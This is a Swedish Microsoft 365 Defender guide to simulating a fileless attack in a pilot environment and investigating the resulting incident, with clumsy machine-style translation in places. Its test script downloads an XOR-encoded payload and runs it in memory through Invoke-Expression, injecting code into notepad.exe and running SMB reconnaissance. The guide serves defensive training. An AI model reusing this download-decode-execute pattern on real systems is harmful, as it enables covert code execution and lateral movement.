Köra en attack simulering i en Microsoft 365 Defender pilotmiljö

Den här artikeln är steg 1 av 2 i processen med att utföra en undersökning och svar på en incident i Microsoft 365 Defender med hjälp av en pilotmiljö. Mer information om den här processen finns i översiktsartikeln.

När du har förberett pilotmiljönär det dags att testa Microsoft 365 Defender:s incidentsvar samt automatiska undersöknings- och åtgärdsfunktioner genom att skapa en incident med en simulerad attack och använda Microsoft 365 Defender-portalen för att undersöka och svara.

En incident i Microsoft 365 Defender är en samling korrelerade varningar och associerade data som utgör storyn av en attack.

Microsoft 365 och appar skapar aviseringar när de upptäcker misstänkt eller skadlig händelse eller aktivitet. Enskilda aviseringar ger värdefulla ledtrådar om en slutförd eller pågående attack. Men attacker använder vanligtvis olika tekniker mot olika typer av enheter, till exempel enheter, användare och postlådor. Resultatet är flera aviseringar för flera enheter i klientorganisationen.

Anteckning

Om du inte har gått igenom säkerhetsanalyser och incidenter tidigare kan du läsa genomgången i Svara på din första incident för att få en guidad genomgång av en typisk process av analys, åtgärd och granskning efter incidenter.

Simulera attacker med Microsoft 365 Defender portalen

I Microsoft 365 Defender-portalen finns inbyggda funktioner för att skapa simulerade attacker i din pilotmiljö:

Defender för Office 365 attack simuleringsutbildning

I defender Office 365 med Microsoft 365 E5 eller Microsoft Defender för Office 365 abonnemang 2 ingår utbildning om attackbedrägerier för nätfiskeattacker. De grundläggande stegen är:

  1. Skapa en simulering

    Stegvisa instruktioner om hur du skapar och skickar en ny simulering finns i Simulera en nätfiskeattack.

  2. Skapa en nyttolast

    Stegvisa instruktioner för hur du skapar en nyttolast för användning i en simulering finns i Skapa en anpassad nyttolast för utbildning av attackattacker.

  3. Få insikter

    Stegvisa instruktioner om hur du får insikter med rapporter finns i Få insikter genom utbildning av attack simulering.

Mer information finns i Simuleringar.

Självstudiekurser om Endpoint-attack & simuleringar

Här är Defender för slutpunkts simuleringar från Microsoft:

  • Dokument tappar tillbakadoor
  • Automatiserad undersökning (backdoor)

Det finns ytterligare simuleringar från Attack IQ och SafeBreach. Det finns även en uppsättning självstudiekurser.

För varje simulering eller självstudiekurs:

  1. Ladda ned och läs motsvarande genomgångsdokument som tillhandahålls med din valda simulering eller scenario.

  2. Ladda ned simuleringsfilen. Du kan välja att ladda ned filen eller skriptet på testenheten men det är inte obligatoriskt.

  3. Kör simuleringsfilen eller skriptet på testenheten enligt anvisningarna i genomgångsdokumentet.

Mer information finns i Upplev Microsoft Defender för Slutpunkt genom simulerad attack.

Simulera en attack med en isolerad domänkontrollant och klientenhet (valfritt)

I den här valfria incidentsvarsövningen simulerar du en attack mot en isolerad AD DS-domänkontrollant (Active Directory Domain Services) och Windows 10-enhet med hjälp av ett PowerShell-skript och sedan undersöka, åtgärda och lösa problemet.

Först måste du lägga till slutpunkter i pilotmiljön.

Lägga till slutpunkter för pilotmiljö

Först måste du lägga till en isolerad AD DS-domänkontrollant och en Windows 10-enhet i pilotmiljön.

  1. Kontrollera att pilotmiljöns klientorganisation har aktiverat Microsoft 365 Defender.

  2. Kontrollera att domänkontrollanten:

  3. Kontrollera att testenheten:

Om du använder klientorganisations- och enhetsgrupper skapar du en dedikerad enhetsgrupp för testenheten och pushar den till den översta nivån.

Ett alternativ är att ha din AD DS-domänkontrollant och testenhet som virtuella maskiner Microsoft Azure infrastrukturtjänster. Du kan använda anvisningarna i Fas 1i den simulerade testlabbguiden för företag , men hoppa över skapandet av den virtuella APP1-datorn.

Här är resultatet.

Slutpunkter för Defender-utvärderingsmiljön med hjälp av den simulerade testlabbguiden för företag

Du kan simulera en avancerad attack som utnyttjar avancerade tekniker för att dölja från identifiering. Attacken räknar upp öppna SMB-sessioner (Server Message Block) på domänkontrollanter och hämtar de senaste IP-adresserna för användarnas enheter. Den här kategorin av attacker omfattar vanligtvis inte filer som släppts på offerts enhet och de förekommer endast i minnet. De "bor utanför landet" genom att använda befintliga system- och administrationsverktyg och mata in kod i systemprocesser för att dölja körningen. Sådana beteenden gör att de kan undvika identifieringen och finnas kvar på enheten.

I den här simuleringen börjar vårt exempelscenario med ett PowerShell-skript. I verkligheten kan en användare luras att köra ett skript, eller så kanske skriptet körs från en fjärranslutning till en annan dator från en tidigare smittad enhet, vilket anger att attacken försöker flytta sig fritt i nätverket. Det kan vara svårt att identifiera de här skripten eftersom administratörer också ofta kör skript på distans för att utföra olika administrativa aktiviteter.

Fillös PowerShell-attack med processindelning och diagram för SMB-reconnaisance-attack

Under simuleringen inkodar attacken skalkod i en till synes process. För scenariot krävs att du använder notepad.exe. Vi valde den här processen för simuleringen, men attacker är mer troliga att de är mål för en långvariga systemprocess, till exempel svchost.exe. Shellcode-koden fortsätter sedan att kontakta attackerens kommando- och kontrollserver (C2) för att få instruktioner om hur du kan fortsätta. Skriptet försöker köra reconnaissance-frågor mot domänkontrollanten (DC). Med hjälp av reconnaissance kan en attackerare få information om den senaste användarinloggningsinformationen. När attackerarna har den här informationen kan de flytta sig i nätverket för att komma till ett visst känsligt konto

Viktigt

För bästa resultat följer du attackberäkningsanvisningarna så nära som möjligt.

Köra den isolerade AD DS-domänkontrollantattackattacken

Så här kör du simuleringen av attackscenariot:

  1. Se till att din pilotmiljö inkluderar den isolerade AD DS-domänkontrollanten och Windows 10 enhet.

  2. Logga in på testenheten med testanvändarkontot.

  3. Öppna Windows PowerShell testenhet.

  4. Kopiera följande simuleringsskript:

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$xor
    = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');$base64String = (Invoke-WebRequest -URI "https://winatpmanagement.windows.com/client/management/static/MTP_Fileless_Recon.txt"
    -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
    $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
    $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
    

    Anteckning

    Om du öppnar den här artikeln i en webbläsare kan du stöta på problem med att kopiera hela texten utan att förlora vissa tecken eller införa extra radbrytningar. I så fall hämtar du dokumentet och öppnar det på Adobe Reader.

  5. Klistra in och kör det kopierade skriptet i PowerShell-fönstret.

Anteckning

Om du kör PowerShell med fjärrskrivbordsprotokoll (RDP) använder du kommandot Skriv urklippstext i RDP-klienten eftersom metoden CTRL-V för snabbtangent eller högerklicks-inklistring kanske inte fungerar. Senaste versioner av PowerShell accepterar inte heller den metoden ibland. Du kan behöva kopiera till Anteckningar i minnet först, kopiera den i den virtuella datorn och sedan klistra in den i PowerShell.

Några sekunder senare öppnas Anteckningar appen. En simulerad attackkod matas in i Anteckningar. Låt den automatiskt genererade Anteckningar instansen vara öppen för hela scenariot.

Den simulerade attackkoden försöker kommunicera till en extern IP-adress (som återspelar C2-servern) och försöker sedan förena domänkontrollanten via SMB.

Det här meddelandet visas på PowerShell-konsolen när det här skriptet har slutförts:

ran NetSessionEnum against [DC Name] with return code result 0

Om du vill se hur funktionen Automatiserat incidenter och svar fungerar i praktiken behåller du notepad.exe processen öppen. Automatiserad incident och svar stoppar processen Anteckningar svar.

Undersök incidenten för simulerad attack

Anteckning

Innan vi går igenom den här simuleringen tittar du på följande video för att se hur incidenthantering hjälper dig att samla relaterade aviseringar som en del av undersökningsprocessen, var du kan hitta dem i portalen och hur det kan hjälpa dig i dina säkerhetsåtgärder:

När du växlar till SOC-analytiker kan du nu börja undersöka attacken i Microsoft 365 Defender portalen.

  1. Öppna Microsoft 365 Defender.

  2. I navigeringsfönstret väljer du Incidenter & aviseringar > Incidenter.

  3. Den nya incidenten för den simulerade attacken visas i incidentkön.

    Exempel på incidentkön

Undersök attacken som en enda incident

Microsoft 365 Defender korrelerar analyser och aggregerar alla relaterade aviseringar och undersökningar från olika produkter till en enda incidentenhet. På så sätt Microsoft 365 Defender en bredare attackhistoria, så att SOC-analytiker kan förstå och reagera på komplexa hot.

Aviseringarna som genererades under den här simuleringen är associerade med samma hot och därför aggregeras automatiskt som en enda incident.

Så här visar du händelsen:

  1. Öppna Microsoft 365 Defender.

  2. I navigeringsfönstret väljer du Incidenter & aviseringar > Incidenter.

  3. Markera det senaste objektet genom att klicka på cirkeln till vänster om incidentnamnet. På en sidopanel visas ytterligare information om händelsen, inklusive alla relaterade aviseringar. Varje incident har ett unikt namn som beskriver den baserat på attributen för de aviseringar som den inkluderar.

    Aviseringarna som visas på instrumentpanelen kan filtreras baserat på tjänstresurser: Microsoft Defender för identitet, Microsoft Cloud App Security, Microsoft Defender för slutpunkt, Microsoft 365 Defender och Microsoft Defender för Office 365.

  4. Välj Öppna incidentsida om du vill ha mer information om incidenten.

    På sidan Incident ser du alla aviseringar och information om händelsen. Informationen omfattar de enheter och tillgångar som ingår i aviseringen, identifieringskällan för aviseringarna (till exempel Microsoft Defender för identitet eller Microsoft Defender för slutpunkt) och orsaken till att de länkades ihop. När du granskar incidentvarningslistan visas attackens förlopp. Från den här vyn kan du se och undersöka enskilda aviseringar.

    Du kan också klicka på Hantera incident i den högra menyn för att tagga händelsen, tilldela den till dig själv och lägga till kommentarer.

Granska genererade aviseringar

Vi tittar på några av de aviseringar som genererades vid en simulerad attack.

Anteckning

Vi går bara igenom några få av de aviseringar som genererats under den simulerade attacken. Beroende på vilken version av Windows och vilka Microsoft 365 Defender-produkter som körs på testenheten kan du se fler aviseringar som visas i en något annan ordning.

Exempel på genererade aviseringar

Avisering: Observerad processinjicering av misstänkt process (källa: Microsoft Defender för slutpunkt)

Avancerade attacker använder avancerade och avancerade metoder för att finnas kvar i minnet och dölja för identifieringsverktyg. En vanlig teknik är att arbeta från en betrodd systemprocess i stället för en skadlig körbar fil, vilket gör det svårt att identifiera verktyg och säkerhetsåtgärder för att upptäcka den skadliga koden.

För att SOC-analytiker ska kunna fånga de här avancerade attackerna tillhandahåller djupminnessensorer i Microsoft Defender för Endpoint vår molntjänst med god insyn i en mängd olika igenkänningstekniker med olika igenkänningstekniker. På följande bild visas hur Defender för Slutpunkt upptäckte och avisering om försök att mata in kod för attnotepad.exe.

Exempel på avisering för inlösning av potentiellt skadlig kod

Varning: Oväntat beteende som observerats av en process som körs utan kommandoradsargument (Källa: Microsoft Defender för slutpunkt)

Microsoft Defender för slutpunktsidentifiering riktar ofta in sig på det vanligaste attributet för en attackteknik. Den här metoden säkerställer att varaktigheten ökar för att attacker ska kunna växla till nyare taktiker.

Vi använder storskaliga utbildningsalgoritmer för att etablera normalt beteende i vanliga processer i en organisation och globalt och se upp när dessa processer visar avvikande beteenden. Dessa avvikande beteenden anger ofta att onenelig kod infördes och körs i en annars betrodd process.

För det här scenariot har processennotepad.exe onormalt beteende, vilket innefattar kommunikation med en extern plats. Det här resultatet är oberoende av den specifika metod som används för att introducera och köra skadlig kod.

Anteckning

Eftersom den här aviseringen är baserad på maskininlärningsmodeller som kräver ytterligare backend-bearbetning kan det ta lite tid innan den här aviseringen visas i portalen.

Observera att aviseringsinformationen omfattar den externa IP-adressen – en indikator som du kan använda som pivot för att utvidga undersökningen.

Välj IP-adressen i aviseringsprocessträdet för att visa sidan med IP-adressinformation.

Exempel på en avisering om oväntat beteende för en process som körs utan kommandoradsargument

På följande bild visas sidan med den valda information om IP-adress (du klickar på IP-adressen i aviseringsprocessträdet).

Exempel på informationssidan för IP-adress

Avisering: Användar- och IP-adressre reconnaissance (SMB) (Källa: Microsoft Defender för identitet)

Uppräkning med SMB-protokollet (Server Message Block) gör det möjligt för attacker att hämta inloggningsinformation för senaste användare som hjälper dem att flytta mellan nätverk för att komma åt ett visst känsligt konto.

Vid den här identifieringen utlöses en avisering när SMB-sessionuppräkning körs mot en domänkontrollant.

Exempel på Microsoft Defender för identitetsavisering för användar- och IP-adressre reconnaissance

Granska enhetens tidslinje med Microsoft Defender för Slutpunkt

När du utforskat de olika aviseringarna i den här incidenten går du tillbaka till sidan som du undersöker tidigare. Välj fliken Enheter på incidentsidan om du vill granska enheterna som är inblandade i den här händelsen enligt uppgifter från Microsoft Defender för Endpoint och Microsoft Defender för identitet.

Välj namnet på enheten där attacken utfördes för att öppna entitetssidan för den specifika enheten. På den sidan kan du se aviseringar som utlöstes och relaterade händelser.

Välj fliken Tidslinje för att öppna enhetens tidslinje och visa alla händelser och beteenden som observerats på enheten i kronologisk ordning, mellankopplade med aviseringarna upphöjda.

Exempel på tidslinje med olika beteenden på enheten

Om du utökar några av de mer intressanta beteendenna får du användbar information, till exempel processträd.

Du kan till exempel rulla nedåt tills du hittar den aviseringshändelse som misstänkt processinställing har observerats. Väljpowershell.exe som matas in notepad.exe-processhändelsen nedanför den för att visa hela processträdet för det här beteendet i diagrammet Händelseenheter i sidofönstret. Använd sökfältet för filtrering om det behövs.

Exempel på processträdet för valt PowerShell-filskapande

Granska användarinformationen med Microsoft Cloud App Security

På incidentsidan väljer du fliken Användare för att visa listan över användare som är inblandade i attacken. Tabellen innehåller ytterligare information om varje användare, inklusive varje användares undersökningsprioriteringspoäng.

Välj användarnamnet för att öppna användarens profilsida där vidare undersökning kan genomföras. Läs mer om att undersöka riskfyllda användare.

Exempel på Cloud App Security användarsida

Automatiserad undersökning och åtgärder

Anteckning

Innan vi går igenom den här simuleringen kan du se följande video för att bekanta dig med vad automatiserat självrektan är, var du hittar det i portalen och hur det kan vara till hjälp i dina säkerhetsåtgärder:

Gå tillbaka till incidenten i Microsoft 365 Defender portalen. På fliken Undersökningar på sidan Incident visas de automatiserade undersökningar som utlöstes av Microsoft Defender för identitet och Microsoft Defender för slutpunkt. I skärmbilden nedan visas endast den automatiska undersökning som utlösts av Defender för Endpoint. Som standard åtgärdar Defender för Slutpunkt automatiskt artefakterna som hittats i kön, vilket kräver åtgärd.

Exempel på automatiserade undersökningar som är relaterade till händelsen

Markera varningsmeddelandet som utlöste en undersökning för att öppna informationssidan Undersökning. Du ser följande information:

  • En avisering som utlöste den automatiska undersökningen.
  • Påverkade användare och enheter. Om indikatorerna finns på ytterligare enheter visas även dessa ytterligare enheter.
  • Lista med bevis. Enheter som hittades och analyserades, till exempel filer, processer, tjänster, drivrutiner och nätverksadresser. Dessa enheter analyseras för möjliga relationer till aviseringen och klassificeras som envärd eller skadlig.
  • Hot hittades. Kända hot som påträffas under undersökningen.

Anteckning

Beroende på tidpunkten kan den automatiska undersökningen fortfarande köras. Vänta några minuter på att processen slutförs innan du samlar in och analyserar bevisen och granskar resultaten. Uppdatera informationssidan Undersökning för att få de senaste resultaten.

Exempel på informationssidan undersökning

Under den automatiska undersökningen identifierade Microsoft Defender för Endpoint notepad.exe-processen, som matades in som en av artefakterna som kräver åtgärd. Defender för Slutpunkt stoppar automatiskt den misstänkta processinjiceringen som en del av den automatiska åtgärd.

Du kan se notepad.exe bort från listan med körningsprocesser på testenheten.

Lösa problemet

När undersökningen är klar och du har bekräftat att du vill åtgärda problemet löser du problemet.

Välj Hantera incidentsidan Incident. Ange statusen Lös incidenten och välj True alert för klassificering och säkerhetstestning för att fastställa händelsen.

Exempel på sidan incidenter med den öppna panelen Hantera incident där du kan klicka på omkopplaren för att lösa problemet

När problemet har lösts löses alla associerade aviseringar i Microsoft 365 Defender och i de relaterade portalerna.

Då avslutas attack simulering för incidentanalys, automatiserad undersökning och incidentlösning.

Nästa steg

Prova Microsoft 365 Defender för incidentsvar

Steg 2 av 2: Microsoft 365 Defender funktioner för incidentsvar

Skapa en Microsoft 365 Defender utvärderingsmiljö